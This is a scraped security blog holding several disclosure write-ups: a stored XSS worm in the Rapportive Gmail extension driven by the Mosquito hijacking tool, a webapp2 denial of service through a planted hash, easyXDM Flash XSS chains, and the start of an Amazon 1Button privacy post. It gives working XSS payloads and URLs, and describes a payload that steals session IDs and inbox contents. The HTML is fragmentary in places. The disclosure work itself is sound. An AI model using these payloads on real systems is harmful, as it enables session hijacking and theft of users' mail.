handlebar(params, ['<a href="{{href}}" class="{{css}}" ', 'onclick="if (rapportiveLogger) { rapportiveLogger.track(\'{{track}}\'); } return true;" target="_blank"', '>{{{contents}}}</a>'], // again, notice triple {{{, no escaping will be done { href: ((href[0] === '/') ? params.rapportive_base_url : '') + href, css: css_classes, track: tracking_text, contents: block && block(this) // evaluates block function, passing result to contents }); }; // for completeness sake function handlebar(params, template, context) { if (template instanceof Array) { template = template.join(""); } return Handlebars.compile(template)(context, params.bound_helpers); } </pre> So, <span style="font-family: Courier New, Courier, monospace;">contact/location</span> value (fetched from a server) ends up in HTML not sanitized (it's only trimmed on 2nd ","). You can control the value in the UI by editing your current location in the profile or just storing it directly on the server and refreshing:<br /> <pre class="brush: js" name="code">rapportive.request({ data: { _method: "put", client_version: rapportive.client_version_base, new_value: '"><script>alert(document.domain)</script>', user_email: rapportive.user_email }, path: "/contacts/email/" + rapportive.user_email + "/location?_method=put&self-xss</a>. What makes it interesting is that:<br /> <ul style="text-align: left;"> <li>it runs at <span style="font-family: Courier New, Courier, monospace;"></span> - a very popular domain</li> <li>it's stored</li> <li><b>It will execute in other users account</b> (in their Gmail application they only need to e.g. look at your emails, search for you etc.)</li> <li>it's totally outside control of the application owner (Google) as the injection happens through the browser extension</li> </ul> <div> All these factors make it a very powerful XSS, capable of creating a spreading worm. And that's exactly what I'll demonstrate with <a href="">Mosquito</a>. </div> <h2> Mosquito?</h2> Mosquito is a tool I wrote some time ago to leverage exploiting XSS in Google Chrome extensions:<br /> <blockquote class="tr_bq"> <blockquote class="tr_bq"> Mosquito is a <b>XSS exploitation tool</b> allowing an attacker to set up a HTTP proxy and leverage XSS to issue arbitrary HTTP requests through victim browser (and victim cookies).</blockquote> <blockquote class="tr_bq"> Mosquito is extremely valuable when exploiting <b>Google Chrome extensions</b>, because via using XSS is extension content script it can usually issue arbitrary cross-domain HTTP requests (breaking the usual Same Origin Policy restrictions).</blockquote> </blockquote> Basically, via WebSocket magic it allows you to hijack victim(s) browser(s) and use your local HTTP proxy to send arbitrary HTTP requests through victim with his/<a href="">hers</a> cookies. So, with mosquito and one XSS you can hijack a browsing session, without knowing the cookies, proving again that <span style="font-family: Courier New, Courier, monospace;">httpOnly</span> is just a <i>snakeoil</i>. Very easy, very effective. If you'd like to know more about the tool, look at <a href="">github.com/koto/mosquito/</a> or see a demo on slide 40 <a href="">here</a>. Rapportive XSS looks like a perfect playground for mosquito.</div> <h2> How to start a botnet?</h2> Well, to make a successful botnet, you need:<br /> <ul style="text-align: left;"> <li>a vulnerability</li> <li>a spreading mechanism</li> <li>command & control</li> </ul> <div> We already have the vulnerability - we can inject arbitrary JS code into location details. Spreading mechanism is easy as well. As the vulnerability triggers when victim (using Rapportive) views our profile, we can e.g.</div> <div> <ul style="text-align: left;"> <li>send a link to the search results: <span style="font-family: Courier New, Courier, monospace;"></span> ,hoping they click on any result,</li> <li>send them an e-mail,</li> <li>convince them to write <i>us</i> an e-mail,</li> <li>... or just wait. Someone will eventually look up infected accounts.</li> </ul> <div> Of course, once the infected profile has been loaded, the code embeds the infection in current user profile, spreading the disease further.<br /> <br /> As for command & control, one can e.g. use Mosquito which will be able to hijack Gmail sessions.<br /> <h2 style="text-align: left;"> Demo</h2> Let's see that in action - starting an infection from <span style="font-family: Courier New, Courier, monospace;">[email protected]</span> into other <span style="font-family: Courier New, Courier, monospace;">*victim*@gmail.com</span>. Payload used in attack:<br /> <ol style="text-align: left;"> <li>hooks victim to Mosquito</li> <li>extracts Rapportive authorize and session IDs (these allow attacker to interact with Rapportive API on behalf of victim)</li> <li>sends Inbox contents and a few contacts to attacker via e-mail (just for fun)</li> </ol> <div> Look at the demo (notice the new <span style="font-family: Courier New, Courier, monospace;"></span> control panel, allowing the attacker to switch between hooked sessions):</div> </div> </div> <div> <br /></div> </div> <iframe allowfullscreen="" frameborder="0" height="315" src="//" width="560"></iframe></div> <h2> Timeline</h2> <div> 2013-12-20 - Sent vulnerability details to vendor, no response</div> <div> 2013-12-21 - Repeated contact, no response</div> <div> 2013-12-27 - Repeated contact, vendor response<br /> 2013-12-27 - Fix and public disclosure</div> <h2> Summary</h2> When dealing with templates, be careful. Avoid <span style="font-family: Courier New, Courier, monospace;">{{{</span> in Handlebars. XSSes are many, but XSS in browser extension is disastrous as it completely breaks the security of websites that the extension is interacting with. Also, I encourage you to try <a href="">Mosquito</a> to demonstrate XSS vulnerabilities. </div> <img src="" height="1" width="1" alt=""/>[email protected] Google AppEngine webapp2 applications with a single hash<div dir="ltr" style="text-align: left;" trbidi="on"> What's this, you think?<br /> <br /> <b>07667c4d55d8d81a0f0ac47b2edba75cb948d3a2$sha1$1FsWaTxdaa5i</b><br /> <div> <br /></div> <div> It's easy to tell that this is a <a href="">salted</a> password hash, using <b>sha1</b> as the hashing algorithm. What do you do with it? You crack it, obviously!<br /> <br /> No wonder that when talking about password hashes security, we usually only consider salt length, using <a href="">salt & pepper</a> or speed of the algorithm. We speculate their resistance to offline bruteforcing. In other words, we're trying to answer the question "how f^*$d are we when the attacker gets to <b>read</b> our hashes". Granted, these issues <i>are</i> extremely important, but there are others.</div> <div> <h2> A weird assumption</h2> <div> Today, we'll speculate what can be done when the attacker gets to <b>supply</b> you with a password hash like above.</div> <div> <br /></div> <div> Who would ever allow the user to submit a password hash, you ask? Well, for example <a href="">Wordpress did</a> and had a DoS because of that. It's just bound to happen from time to time (and it's not the point of this blog post anyway), Let's just assume this is the case - for example, someone <b>wrote a malicious hash</b> in your DB. <br /> <h2> Introducing the culprit</h2> We need to have some code to work on. Let's jump on the cloud bandwagon and take a look at <a href="">Google AppEngine</a>. For Python applications, Google <a href="">suggests</a> <a href="">web<span id="goog_1309499097"></span><span id="goog_1309499098"></span>app2</a>. Fine with me, let's do it!<br /> <br /> When authenticating users in webapp2, you can just make them use Google Accounts and rely on OAuth, but you can also manage your users accounts & passwords on your own. Of course, passwords are then salted and hashed - you can see the example hash at the beginning of this post. For hashing, <a href="">webapp2 security module</a> uses a standard Python module, <a href="">hashlib</a>.<br /> <h2> Authenticating in webapp2</h2> When does webapp2 application process a hash? Usually, when authenticating. For example, if user <span style="font-family: Courier New, Courier, monospace;">ba_baracus</span> submits a password <span style="font-family: Courier New, Courier, monospace;">ipitythefool</span>, application:<br /> <ol style="text-align: left;"> <li>Finds the record for user <span style="font-family: Courier New, Courier, monospace;">ba_baracus</span></li> <li>Extracts his password hash: <span style="font-family: Courier New, Courier, monospace;">07667c4d55d8d81a0f0ac47b2edba75cb948d3a2$sha1$1FsWaTxdaa5i</span></li> <li>Parses it, extracting the random salt (<span style="font-family: Courier New, Courier, monospace;">1FsWaTxdaa5i</span>) and algorithm (<span style="font-family: Courier New, Courier, monospace;">sha1</span>)</li> <li>Calculates <span style="font-family: Courier New, Courier, monospace;">sha1</span> hash of <span style="font-family: Courier New, Courier, monospace;">ipitythefool</span>, combined with the salt (e.g. uses <span style="font-family: Courier New, Courier, monospace;">hmac</span> with salt as a key)</li> <li>Compares the result with <span style="font-family: Courier New, Courier, monospace;">07667c4d55d8d81a0f0ac47b2edba75cb948d3a2</span>. Sorry, Mr T, password incorrect this time!</li> </ol> <div> <div class="separator" style="clear: both; text-align: center;"> <a href="" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="" width="320" /></a></div> <br /> 1 and 2 happen in <a href="">User.get_by_auth_password()</a> 3 to 5 in in <a href="">webapp2_extras.security.check_password_hash(</a>):<br /> <pre class="brush: python; highlight: [21,22,48,49,50,51,52,53,54,55]" name="code">def check_password_hash(password, pwhash, pepper=None): """Checks a password against a given salted and hashed password value. In order to support unsalted legacy passwords this method supports plain text passwords, md5 and sha1 hashes (both salted and unsalted). :param password: The plaintext password to compare against the hash. :param pwhash: A hashed string like returned by :func:`generate_password_hash`. :param pepper: A secret constant stored in the application code. :returns: `True` if the password matched, `False` otherwise. This function was ported and adapted from `Werkzeug`_. """ if pwhash.count('$') < 2: return False hashval, method, salt = pwhash.split('$', 2) return hash_password(password, method, salt, pepper) == hashval def hash_password(password, method, salt=None, pepper=None): """Hashes a password. Supports plaintext without salt, unsalted and salted passwords. In case salted passwords are used hmac is used. :param password: The password to be hashed. :param method: A method from ``hashlib``, e.g., `sha1` or `md5`, or `plain`. :param salt: A random salt string. :param pepper: A secret constant stored in the application code. :returns: A hashed password. This function was ported and adapted from `Werkzeug`_. """ password = webapp2._to_utf8(password) if method == 'plain': return password method = getattr(hashlib, method, None) if not method: return None if salt: h = hmac.new(webapp2._to_utf8(salt), password, method) else: h = method(password) if pepper: h = hmac.new(webapp2._to_utf8(pepper), h.hexdigest(), method) return h.hexdigest() </pre> So, during authentication, we control <span style="font-family: Courier New, Courier, monospace;">pwhash</span><b> </b>(it's our planted hash), and <span style="font-family: Courier New, Courier, monospace;">password</span>. What harm can we do? First, a little hashlib 101:<br /> <h2> Back to school</h2> How does one use hashlib? First, you create an object with a specified algorithm:<br /> <blockquote class="tr_bq"> <pre class="sourcelines stripes4 wrap" style="background-color: white; counter-reset: lineno 0; font-size: 12px; position: relative;">new(name,>> hashlib.new('md5','a string').hexdigest() '3a315533c0f34762e0c45e3d4e9d525c'</pre> <br /> Webapp2 uses <span style="font-family: Courier New, Courier, monospace;">getattr(hashlib, <b>method</b>)(<b>password</b>).hexdigest()</span>, and we control both method and password.<br /> <br /> Granted, the construct does its job. Installed algorithms work, <span style="font-family: Courier New, Courier, monospace;">NoneType</span> error is thrown for non supported algorithms, and the hash is correct:<br /> <pre class="brush: python" name="code">>>> getattr(hashlib, 'md5', None)('hash_me').hexdigest() '77963b7a931377ad4ab5ad6a9cd718aa' >>> getattr(hashlib, 'sha1', None)('hash_me').hexdigest() '9c969ddf454079e3d439973bbab63ea6233e4087' >>> getattr(hashlib, 'nonexisting', None)('hash_me').hexdigest() Traceback (most recent call last): File "<stdin>", line 1, in <module> TypeError: 'NoneType' object is not callable </pre> <h2> It's a kind of magic!</h2> There is a slight problem with this approach though - <a href="">magic methods</a>. Even a simple <span style="font-family: Courier New, Courier, monospace;">__dir__</span> gives us a hint that there's quite a few additional, magic methods:<br /> <pre class="brush: python" name="code">>>> dir(hashlib) ['__all__', '__builtins__', '__doc__', '__file__', '__get_builtin_constructor', '__name__', '__package__', '_hashlib', 'algorithms', 'md5', 'new', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512'] </pre> which means, for example, that if arbitrary strings can be passed as 2nd attribute to <span style="font-family: Courier New, Courier, monospace;">getattr()</span>, there's much more than <span style="font-family: Courier New, Courier, monospace;">NoneType</span> error that can happen: <br /> <pre class="brush: python" name="code">>>> getattr(hashlib, '__name__')() Traceback (most recent call last): File "<stdin>", line 1, in <module> TypeError: 'str' object is not callable >>> getattr(hashlib, '__class__') <type 'module'> >>> getattr(hashlib, '__class__')('hash_me') <module 'hash_me' (built-in)> >>> getattr(hashlib, 'new')('md5').hexdigest() 'd41d8cd98f00b204e9800998ecf8427e' # this is actually md5 of '' </pre> That last bit is kewl - you can plant a hash format: <b>md5_of_empty_string$new$</b> and the correct password is... <b>md5</b>!<br /> <h2> Final act</h2> __class__ may have a class, but <a href="">__delattr__</a> is the real gangster! <br /> <pre class="brush: python" name="code">>>> import hashlib >>> hashlib.sha1 <built-in >>> getattr(hashlib, '__delattr__')('sha1').hexdigest() Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: 'NoneType' object has no attribute 'hexdigest' >>> hashlib.sha1 Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: 'module' object has no attribute 'sha1' </pre> <br /> <b>Ladies and gentlemen, we just broke a Google AppEngine webapp2 application with a single hash! </b>We just deleted the whole <span style="font-family: Courier New, Courier, monospace;">hashlib.sha1</span> function, and all subsequent hash comparison will be invalid! In other words, no user in this application instance with <span style="font-family: Courier New, Courier, monospace;">sha1</span> hash will be able to authenticate. Plus, we broke session cookies as well, as session cookies use <span style="font-family: Courier New, Courier, monospace;">hashlib.sha1</span> for signature (but that's another story). As this is not a PHP serve-one-request-and-die model, but a full-blown web application, this corrupted <span style="font-family: Courier New, Courier, monospace;">hashlib</span> will live until application has shut down and gets restarted <span style="font-size: xx-small;">(methinks, at least that's the behavior I observed)</span>. After that, you can still retrigger that vuln by authenticating again! <br /> <h2> Demo</h2> <div> <iframe allowfullscreen="" frameborder="0" height="315" src="//" width="420"></iframe> </div> <b>Disclaimer: </b>This is tracked with <a href="">issue #87</a><b>. </b>Only applications that allow the user to write a hash somehow are vulnerable (and this setup is probably exotic). But <span style="font-family: Courier New, Courier, monospace;">getattr(hashlib, something-from-user)</span> construct is very popular, so feel free to find a similar vulnerability elsewhere:<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="126" src="" width="320" /></a></div> <br /></div> </div> </div> </div> <img src="" height="1" width="1" alt=""/>[email protected] EasyXDM part 2: & considered harmful<div dir="ltr" style="text-align: left;" trbidi="on"> <div dir="ltr" trbidi="on"> <br /> <i><b>tldr: </b>URL parsing is hard, always encode stuff and Safari has some interesting properties...</i><br /> <i><b><br /></b></i> <i>This is a second post describing easyXDM vulnerabilities. Reading the first part might come in handy:</i><br /> <ul style="text-align: left;"> <li><a href="">Exploiting EasyXDM part 1: Not the usual Flash XSS</a></li> </ul> >.<br /> <br /> In first post I've described <a href="">XSS vulnerability in Flash transport</a> used by that library, however the exploit conditions were very limiting. On websites using easyXDM the following code (used e.g. to set up RPC endpoints):<br /> <pre class="html" name="code"><script type="text/javascript" src="easyXDM.debug.js"> </script> <script type="text/javascript"> var transport = new easyXDM.Socket({ local: ".", swf: "easyxdm.swf", }); </script> </pre> can cause XSS when it's loaded by URL like: <span style="font-family: Courier New, Courier, monospace;">))%7Dcatch(e)%7Balert(document.domain)%7D%2F%2Feheheh</span>. That will force easyXDM to use vulnerable Flash transport and pass the injected XSS payload. However, the payload will only be used unless Flash file is set up with FlashVars parameter <span style="font-family: Courier New, Courier, monospace;">log=true</span>.<br /> <h2> Mom, where do flashvars come from?</h2> Let's dig deeper. How is the HTML for the SWF inclusion constructed? Looking at the source code at GitHub (<a href="">FlashTransport.js</a>):<br /> <pre class="brush:js;highlight:[5,7]" name="code">function addSwf(domain){ ... // create the object/embed varpreprocessor</a> instruction. The <span style="font-family: Courier New, Courier, monospace;">#ifdef</span> / <span style="font-family: Courier New, Courier, monospace;">#endif</span> block of code will only be included in <span style="font-family: Courier New, Courier, monospace;">easyXDM.<b>debug</b>.js</span> file:<br /> <pre name="code"><!-- Process pre proccesing instructions like #if/#endif etc --> <preprocess infile="work/easyXDM.combined.js" outfile="work/easyXDM.js"/> <preprocess infile="work/easyXDM.combined.js" outfile="work/easyXDM.debug.js" defines="debug"/></pre> Exploiting <span style="font-family: Courier New, Courier, monospace;">easyXDM.debug.js</span> file described in the first post was straightforward. But if production version of easyXDM library is used instead, there is no <span style="font-family: Courier New, Courier, monospace;">log</span> parameter and XSS won't work. What can we do? Like always - look at the code, because <span style="font-family: Courier New, Courier, monospace;">code=vulns</span>.<br /> <h2> Thou shalt not parse URLs thyself!</h2> In FlashVars construction code <span style="font-family: Courier New, Courier, monospace;">getPort</span> and <span style="font-family: Courier New, Courier, monospace;">getDomainName</span> functions are used to extract domain and port parameters from current window location (<span style="font-family: Courier New, Courier, monospace;">global.location</span>). Let's see what happens with domain name (<a href="">Core.js</a>):<br /> <pre class="js" name="code">function getDomainName(url){ // #ifdef debug if (!url) { throw new Error("url is undefined or empty"); } // #endif return url.match(reURI)[3]; } </pre> <div dir="ltr" trbidi="on"> <div dir="ltr" trbidi="on"> It is being matched against the following regular expression:<br /> <pre class="js" name="code">var reURI = /^((http.?:)\/\/([^:\/\s]+)(:\d+)*)/; // returns groups for protocol (2), domain (3) and port (4) </pre> In simpler terms - everything after <span style="font-family: Courier New, Courier, monospace;">httpX://</span> and before <span style="font-family: Courier New, Courier, monospace;">:digits</span> or a <span style="font-family: Courier New, Courier, monospace;">/</span> becomes a domain name. Seems solid, right? WRONG.</div> Among many tricks bypassing URL parsers (see e.g. <a href="">kotowicz.net/absolute</a>), HTTP authentication parameters are rarely used. But this time they fit perfectly. You see, hostname (domain name) is not the only thing that comes right after protocol. Not to bore you with <a href="">RFCs</a>, this is also a valid URL:<br /> <span style="font-family: Courier New, Courier, monospace;"><br /></span> <span style="font-family: Courier New, Courier, monospace;"></span><br /> <div> <br /></div> <div> If our document was loaded from URL containing user credentials, <span style="font-family: Courier New, Courier, monospace;">getDomainName() </span>would return <span style="font-family: Courier New, Courier, monospace;">user:password@host </span>(sometimes, there are browser differences here). FlashVars, in that case, would be: </div> <div> <pre class="brush:js;highlight:[5]" name="code">callback=flash_loaded_something&proto=http:&domain=user:password@host&port=&ns=something</pre> </div> </div> <div> Still, nothing interesting, but...</div> <h2> Honor thy Encoding and thy Context<) Wumo - <a href=""></a></td></tr> </tbody></table> In previous example we injected some characters into FlashVars string, but none of them were dangerous in that context. But as you can see: <br /> <pre class="js" name="code"> varencodeURIComponent </span>is not used) If we could only use <b>&</b> and <b>=</b> characters in username part, we could <b>inject additional Flashvars</b>. For example, loading this URL:<br /> <br /> <span style="font-family: Courier New, Courier, monospace;">http://<b>example.com&log=true&a=</b>@example.com?#xdm_e=https%3A%2F%2Flossssscalhost&xdm_c=default7059&xdm_p=6&xdm_s=j%5C%22-alerssst(2)))%7Dcatch(e)%7Balert(document.domain)%7D%2F%2Feheheh</span><br /> <div> <br /> (the bold part is actually the <b>username</b>, not a domain name) would cause:</div> <pre name="code">...proto=http:&domain=example.com&log=true&[email protected]&port=... </pre> injecting our <span style="font-family: Courier New, Courier, monospace;">log=true</span> parameter and triggering the exploit. But can we? <br /> <h2> Effin phishers!</h2> Kinda. Credentials in URL were used extensively in phishing attacks, so most current browsers don't really like them. While usually you can use = and & characters in credentials, there are serious obstacles, f.e:<br /> <ul style="text-align: left;"> <li>Firefox won't return credentials at all in <span style="font-family: Courier New, Courier, monospace;">location.href</span></li> <li>Chrome will percent encode crucial characters, including = and &</li> </ul> <div class="separator" style="clear: both; text-align: center;"> <a href="" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="" width="200" /></a></div> However, Safari 6 does not see a problem with loading URL like this: <b> </b>and returning the same thing in<b> location.href. </b>So - easyXDM 2.4.16 is XSS exploitable in Safari 6 and possibly in some other obscure or ancient browsers. In Safari due to effing phishers using credentials in URL will trigger a phishing warning, so the user must confirm the navigation. Well, Sad Panda^2. But still - it's an easyXDM universal XSS on a popular browser with limited user interaction.<br /> <h2> Developers</h2> <ul style="text-align: left;"> <li>Always use context aware encoding!</li> <li>Don't parse URLs manually!</li> </ul> </div> </div> <img src="" height="1" width="1" alt=""/>[email protected] EasyXDM part 1: Not the usual Flash XSS<div dir="ltr" style="text-align: left;" trbidi="on"> <b>tldr: </b>You're using easyXDM? Upgrade NOW. Otherwise - read up on exploiting difficult Flash vulnerabilities in practice.<br /> <br /> Secure cross-domain communication is hard enough, but it's a piece of cake compared to making it work in legacy browsers. One popular library that tries to handle all the quirks and even builds an RPC framework is <a href="">easyXDM</a>.<br /> <br /> But this is not an advertisement. As usual, you only get to hear about easyXDM here, because I found some interesting vulnerabilities. Combined, those allow me to XSS websites using that library. <span style="font-size: xx-small;">Certain conditions apply. </span>As exploiting the subject matter is quite complex, I decided to split the post into two parts, this being the first one.<br /> <a name='more'></a>>. As a side note - don't we all love <a href="">working around this pesky Same Origin Policy</a>?<br /> <br /> Off we go!<br /> <br /> EasyXDM is a library for client-side (i.e. window to window) communication. For example, it allows one to setup an <a href="">RPC</a> endpoint that could be accessed cross-domain. Imagine <span style="font-family: Courier New, Courier, monospace;"></span> document calling functions from <span style="font-family: Courier New, Courier, monospace;"></span> (see <a href="">example</a>). We don't need the ful setup though. For our purpose, all we're interested in is that there is some <span style="font-family: Courier New, Courier, monospace;"></span> document with easyXDM script that initializes <span style="font-family: 'Courier New', Courier, monospace;">EasyXDM.Rpc</span> endpoint based on <i>some</i> input parameters.<br /> <br /> Remember that cross-browser requirement? Nowadays we can just use HTML5 <a href="">postMessage API</a> to transport messages cross-domain, but for legacy browsers we need to rely on old & dirty tricks. EasyXDM supports quite a few transport mechanisms. One of them is Flash. And this brings us to:<br /> <h2> Flash XSS. Hell yeah!</h2> Flash transport is implemented in small <span style="font-family: Courier New, Courier, monospace;">easyxdm.swf</span> file that uses <a href=""><span style="font-family: Courier New, Courier, monospace;">LocalConnection</span></a> for transferring messages (see <a href="">source</a>). It also uses <span style="font-family: Courier New, Courier, monospace;"><a href="">ExternalInterface</a></span> to communicate with JS on embedding document (in our case, <span style="font-family: 'Courier New', Courier, monospace;"></span>). The same <span style="font-family: Courier New, Courier, monospace;">ExternalInterface</span> that was used <a href="">multiple</a> <a href="">times</a> as a handy XSS enabler. Putting all past great research in two points:<br /> <ul style="text-align: left;"> <li>If anything attacker controlled ends up in <span style="font-family: Courier New, Courier, monospace;">ExternalInterface.call()</span>, we have a really nasty XSS on a page embedding Flash that Adobe won't fix but should have,</li> <li>The vector is <span style="font-family: Courier New, Courier, monospace;">\"));throw_error()}catch(e){alert(1))}//</span></li> <li>Usually the payload is in <a href="">FlashVars</a> (parameters passed from HTML document to Flash application) and is trivial to trigger because you can just load a <span style="font-family: Courier New, Courier, monospace;"></span> URL. </li> </ul> <div class="separator" style="clear: both; text-align: center;"> </div> However, it's not a walk in the park here as:<br /> <blockquote class="tr_bq"> <b>This release, and specifically the new FlashTransport has </b>now<b> been audited </b>by a member of the Google Security-team, and <b>we are quite confident in its level of security</b>.</blockquote> <div style="text-align: right;"> <a href=""></a></div> <div style="text-align: right;"> <br /></div> That shouldn't scare us, right? Let's look what gets passed to <span style="font-family: Courier New, Courier, monospace;">ExternalInterface.call()</span>. <b> </b>We'll quickly find that <b>if debug output is enabled</b> (which happens when <a href="">FlashVar</a> <span style="font-family: Courier New, Courier, monospace;">log=true</span>), <span style="font-family: Courier New, Courier, monospace;">channel</span> and <span style="font-family: Courier New, Courier, monospace;">secret</span> variables end up in there.<br /> <pre class="javascript" name="code">// createChannel function... var receivingChannelName:createChannel</span> function in HTML document, so they are passed from Javascript. And, while <span style="font-family: Courier New, Courier, monospace;">channel</span> is sanitized with character whitelist, <span style="font-family: Courier New, Courier, monospace;">secret</span> is not:<br /> <pre class="javascript" name="code">ExternalInterface.addCallback("createChannel", { }, function(channel:String, secret:String, remoteOrigin:String, isHost:Boolean) { if (!Main.Validate(channel)) return; ...// Main.validate(secret) should be here as well... </pre> So, if attacker can set the <span style="font-family: Courier New, Courier, monospace;">secret</span> to e.g.<br /> <pre class="javascript" name="code">j\"-alerssst(2)))}catch(e){alert(document.domain)}// </pre> <div style="text-align: left;"> and force the Flash file to log that secret, we have XSS. Pay attention though, <b><span style="font-family: Courier New, Courier, monospace;">secret</span> is not a FlashVar</b>, so the exploitation is different. To trigger the vulnerability on <span style="font-family: Courier New, Courier, monospace;">rpc.example.net</span>, we need a document there that looks roughly like this:</div> <pre class="html" name="code"><object classid="..." id="swf"> <param name="movie" value="easyxdm.swf" /> <param name=FlashVars </object> <script> document.getElementById('swf').createChannel('channel', 'j\"-alerssst(2)))}catch(e){alert(document.domain)}//', ...); </script> </pre> <div style="text-align: left;"> Of course, we cannot create such a document directly (we'd need XSS for that), To achieve our goal, we'll use some gadgets from easyXDM to do that work for us, sort of like <a href="">ROP</a>. Told you - not a walk in the park. To exploit the flaw in easyXDM RPC endpoint we need to:</div> <ol style="text-align: left;"> <li>force easyXDM to use Flash transport</li> <li>have control over the <span style="font-family: Courier New, Courier, monospace;">secret</span> value</li> <li>force <span style="font-family: Courier New, Courier, monospace;">easyxdm.swf</span> to use debugging output</li> </ol> <div> Let's do it!</div> <h2> Force Flash transport</h2> As easyXDM uses various transport mechanisms, it needs a way of telling remote party which transport method will be used. The author decided the URL of the endpoint itself for that purpose. Initialization parameters are extracted from <span style="font-family: Courier New, Courier, monospace;">location</span> object (<a href="">source</a>):<br /> <pre class="javascript" name="code">// build the query object either from location.query, if it contains the xdm_e argument, or from location.hash var query = (function(input){ input = input.substring(1).split("&"); var data = {}, pair, i = input.length; while (i--) { pair = input[i].split("="); data[pair[0]] = decodeURIComponent(pair[1]); } return data; }(/xdm_e=/.test(location.search) ? location.search : location.hash)); function prepareTransportStack(config){ // ... config.channel = query.xdm_c.replace(/["'<>\\]/g, ""); config.secret = query.xdm_s; config.remote = query.xdm_e.replace(/["'<>\\]/g, ""); protocol = query.xdm_p; // ... } </pre> We can of course abuse that setup and force easyXDM to use the vulnerable Flash transport. That requires setting <span style="font-family: Courier New, Courier, monospace;">xdp=6</span> parameter in the URL (easiest to do in fragment part of an URI). So all you need is <span style="font-family: 'Courier New', Courier, monospace;"></span><span style="font-family: 'Courier New', Courier, monospace;">xdp_p=6</span>.<br /> <h2> Whisper the secret</h2> Similar to 1. GET <span style="font-family: Courier New, Courier, monospace;">xdp_s</span> parameter value becomes a channel <i>secret</i> and easyXDM passes that to <span style="font-family: Courier New, Courier, monospace;">createChannel()</span> function automatically. Attacker only needs to append <span style="font-family: Courier New, Courier, monospace;">xdp_s</span> parameter to URI fragment part, e.g.: <br /> <pre name="code"><span style="font-family: 'Courier New', Courier, monospace;"></span><span style="font-family: Courier New, Courier, monospace;">#xdp_p=6&xdp_s=j%5C%22-alerssst(2)))%7Dcatch(e)%7Balert(location)%7D%2F%2Feheheh</span></pre> <h2> Turn on debugging</h2> Flash file must use the debugging functionality, which requires passing FlashVars <span style="font-family: Courier New, Courier, monospace;">log</span> parameter with the value <span style="font-family: Courier New, Courier, monospace;">true</span>. Luckily, this is the default value if RPC endpoint uses <span style="font-family: Courier New, Courier, monospace;">easyXDM.debug.js</span> script. For example <i>if</i> <span style="font-family: Courier New, Courier, monospace;"></span> contains:<br /> <pre class="javascript" name="code"><script type="text/javascript" src="easyXDM.debug.js"></script> <script type="text/javascript"> var transport = new easyXDM.Socket({ local: ".", swf: "", }); </script> </pre> Then exploiting it requires navigating to:<br /> <span style="font-family: Courier New, Courier, monospace;">))%7Dcatch(e)%7Balert(document.domain)%7D%2F%2Feheheh</span><br /> <br /> Sites implementing EasyXDM are vulnerable if <span style="font-family: Courier New, Courier, monospace;">easyxdm.debug.js</span> is included anywhere in the codebase in documents that call <span style="font-family: Courier New, Courier, monospace;">EasyXDM.Socket()</span> or <span style="font-family: Courier New, Courier, monospace;">EasyXDM.Rpc()</span>. What's worse, standard easyXDM distribution has a lot of these documents, e.g. located in <span style="font-family: Courier New, Courier, monospace;">test</span><span style="font-family: inherit;"> and </span><span style="font-family: Courier New, Courier, monospace;">example</span> subdirectories. So if the full distribution of easyXDM < 2.4.18 is uploaded somewhere, XSS is as easy as:<br /> <br /> <span style="font-family: Courier New, Courier, monospace;">))%7Dcatch(e)%7Balert(location)%7D%2F%2Feheheh</span><br /> <h2> Summary</h2> So we have an exploitable XSS vulnerability on websites that:<br /> <ul style="text-align: left;"> <li>use full installation of easyXDM library with exemplary directories reachable by URL</li> <li>or use <span style="font-family: Courier New, Courier, monospace;">easyxdm.debug.js</span> script in their code.</li> </ul> <div> Neat, but it's not enough. I was able to find another chained vulnerability to XSS <b>all </b>websites using easyXDM library, not needing to rely on the <span style="font-family: Courier New, Courier, monospace;">easyxdm.debug.js</span> script defaults. But that's a story for the 2nd post...<br /> <br /> <i>This is a first post describing easyXDM vulnerabilities. The second post is available at:</i><br /> <ul> <li><a href="">Exploiting EasyXDM part 2: & considered harmful</a></li> </ul> </div> </div> <img src="" height="1" width="1" alt=""/>[email protected] of PRISM? Use "Amazon 1 Button" Chrome extension to sniff all HTTPS websites!<div dir="ltr" style="text-align: left;" trbidi="on"> <div dir="ltr" style="text-align: left;" trbidi="on"> <b>tldr:</b> Insecure browser addons may leak all your encrypted SSL traffic, exploits included<br /> <br /> So, Snowden let the cat out of the bag. They're listening - the news are so big, that feds are <a href="">no longer welcome at DEFCON.</a> But let's all be honest - who doesn't like to snoop into other person's secrets? We all know how to set up rogue AP and use ettercap. Setting up your own wall of sheep is <a href="">trivial</a>. I think we can safely assume - <b>plaintext traffic is dead easy to sniff and modify</b>.<br /> <br /> The real deal though is in the encrypted traffic. In browser's world that means <b>all the juicy stuff is sent over HTTPS</b>. Though intercepting HTTPS connections is possible, we can only do it via: <br /> <ul style="text-align: left;"> <li>hacking the CA</li> <li>social engineering (install the certificate) </li> <li>relying on click-through syndrome for SSL warnings</li> </ul> Too hard. Let's try some side channels. Let me show you how you can <b>view all SSL encrypted data</b>, via exploiting <a href=""><b>Amazon 1Button App</b></a> installed on your victims' browsers. <br /> <a name='more'></a><h2 style="text-align: left;"> The extension info</h2> <div style="text-align: left;"> Some short info about our hero of the day:<br /> <br /> <a href="">Amazon 1Button App Chrome extension</a></div> <div style="text-align: left;"> Version: 3.2013.627.0<br /> Updated: June 28, 2013</div> <div style="text-align: left;"> </div> <div style="text-align: left;"> <br /> <b></b></div> <div class="separator" style="clear: both; text-align: center;"> <a href="" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217">1,791,011</b> users (scary, becase the extension needs the following permissions):</div> <div class="separator" style="clear: both; text-align: center;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="246" src="" width="320" /></a></div> <h2 class="separator" style="clear: both; text-align: left;"> Amazon cares for your privacy...not</h2> <div class="separator" style="clear: both; text-align: left;"> First, a little info about how it abuses your privacy, in case you use it already (tldr; uninstall NOW!). There's a few interesting things going on (all of them require no user interaction and are based on default settings):</div> <h3> It reports to Amazon every URL you visit, even HTTPS URLs.</h3> <pre class="brush: text">GET /gp/bit/apps/web/SIA/scraper?url= 